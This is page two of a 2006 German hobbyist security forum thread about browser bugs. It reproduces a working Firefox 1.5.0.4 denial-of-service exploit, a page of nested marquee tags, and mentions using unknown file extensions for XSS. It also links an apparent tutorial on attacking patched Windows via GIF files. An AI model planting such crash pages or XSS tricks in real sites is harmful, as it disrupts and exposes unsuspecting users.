Willkommen bei Network & Security     remoteshell-security.com
Partnerseiten
login.php?sid=3a01c4693b204d59c973e0356e24f27b profile.php?mode=register&sid=3a01c4693b204d59c973e0356e24f27b faq.php?sid=3a01c4693b204d59c973e0356e24f27b memberlist.php?sid=3a01c4693b204d59c973e0356e24f27b search.php?sid=3a01c4693b204d59c973e0356e24f27b index.php?sid=3a01c4693b204d59c973e0356e24f27b

Foren-Übersicht » Sicherheitslücken » Browser Fehler Gehe zu Seite Zurück  1, 2
Neues Thema eröffnen  Neue Antwort erstellen Vorheriges Thema anzeigen :: Nächstes Thema anzeigen 
BeitragVerfasst am: 10.03.2006 20:10 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beiträge: 717
Wohnort: www and 127.0.0.1/localhost




Jo ich probier es grade hinzubekommen das endlich der mediawiki geht ><
Ich schaff das schon da ich aber krank bin geht alles etwas langsamer

_________________
Eine Kette ist nur so stark wie ihr schwächstes Glied.

Die Welt wird nicht von denen bedroht die böse sind,sondern von denen die das Böse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 25.06.2006 18:22 Antworten mit Zitat
Rebellion
Anmeldedatum: 04.01.2006
Beiträge: 151
Wohnort: %systemroot%




Mozilla Firefox <= 1.5.0.4 Denial of Service Exploit:

Code:
<html>
<head>
<title>Mozilla Firefox <= 1.5.0.4 Denial of Service Exploit</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 25.06.2006 18:51 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beiträge: 569
Wohnort: /proc




Hi,

ja interessanter Exploit habe ihn auch gerade unter Milw0rm gesehen.

Dabei fällt mir zu der unbekannten Endung von Html Dokumenten noch was ein.

Egal ob Firefox, Internet Explorer oder Opera, bei all diesen Browsern ist es so, das wenn man eine unbekannte Datei-Endung
benutzt und in der Datei Html-Tags enthalten sind, das diese vom jeweiligen Browser interpretiert wird.

http://ia41.ia.ohost.de/proof.alalaba


mfg duddits

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
BeitragVerfasst am: 25.06.2006 19:36 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beiträge: 369
Wohnort: /offtopic




@duddits:
Das stimmt, aber wobei liegt denn da das Schadpotential?
Ich sehe diese Funktion eher als eine Konvention an, um eine Art Standard herzustellen. Was sollte denn sonst bei einer Datei mit unbekannter Endung hinter dem Punkt passieren? Ausserdem sollte man mit HTML nicht so viel anrichten können, ausser dem da oben natürlich.^^

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstörung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhäusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 25.06.2006 20:55 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beiträge: 717
Wohnort: www and 127.0.0.1/localhost




Das ist dazu da um fremden code ausführen
Gut für XSS oder ähnliches.
Das hatte ich aber schonmal alles aufgeschrieben Wink imho
Aber bei endungen die schon vergeben sind gehts nur bei'm IExploder

_________________
Eine Kette ist nur so stark wie ihr schwächstes Glied.

Die Welt wird nicht von denen bedroht die böse sind,sondern von denen die das Böse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 04.07.2006 16:15 Antworten mit Zitat
BadLord
Anmeldedatum: 19.05.2006
Beiträge: 11




Naja, schade ich habe mir gedacht ich schreib mal ein Tutorial dort behandle ich ein paar Ideen den IE abkacken zu lassen aber einige sind hier eben schon genannt.
Hätte noch wer Interesse an dem ejtzt schon fertigen tut?

lg Wink
Benutzer-Profile anzeigen Private Nachricht senden
BeitragVerfasst am: 04.07.2006 16:19 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beiträge: 357
Wohnort: /dev/RL




Wenns so wie so fertig is kannste das auch posten Smile

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 04.07.2006 16:20 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beiträge: 569
Wohnort: /proc




Hi,

gerne immer doch. Tutorials sind hier immer herzlichst willkommen auch
wenn Teile davon schon in anderen Threads behandelt wurden.

mfg duddits

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
So mein Tut dann ma :)
BeitragVerfasst am: 04.07.2006 16:38 Antworten mit Zitat
BadLord
Anmeldedatum: 19.05.2006
Beiträge: 11




[url]
http://guestbook1.gu.funpic.de/Gepatchtes_Windows_Angreifen_GIF.doc
[/url]
Benutzer-Profile anzeigen Private Nachricht senden
BeitragVerfasst am: 04.07.2006 19:43 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beiträge: 782
Wohnort: Engelskirchen




Hi,

der IE7 ist doch etwas sicherer geworden.

Der IE nervt nämlich dann mit seinem Phishing und Active-X Filter und selbst wenn ich das ignoriere, zeigt er unten links an, dass das Bild Fehler enthält.
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
Browser Fehler
Foren-Übersicht » Sicherheitslücken
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 2 von 2  
Gehe zu Seite Zurück  1, 2
  
  
 Neues Thema eröffnen  Neue Antwort erstellen  


Forensicherheit

Powered by phpBB © 2001-2004 phpBB Group
phpBB Style by Vjacheslav Trushkin
Deutsche Übersetzung von phpBB.de


remoteshell-security.com | Partner | Boardregeln | Impressum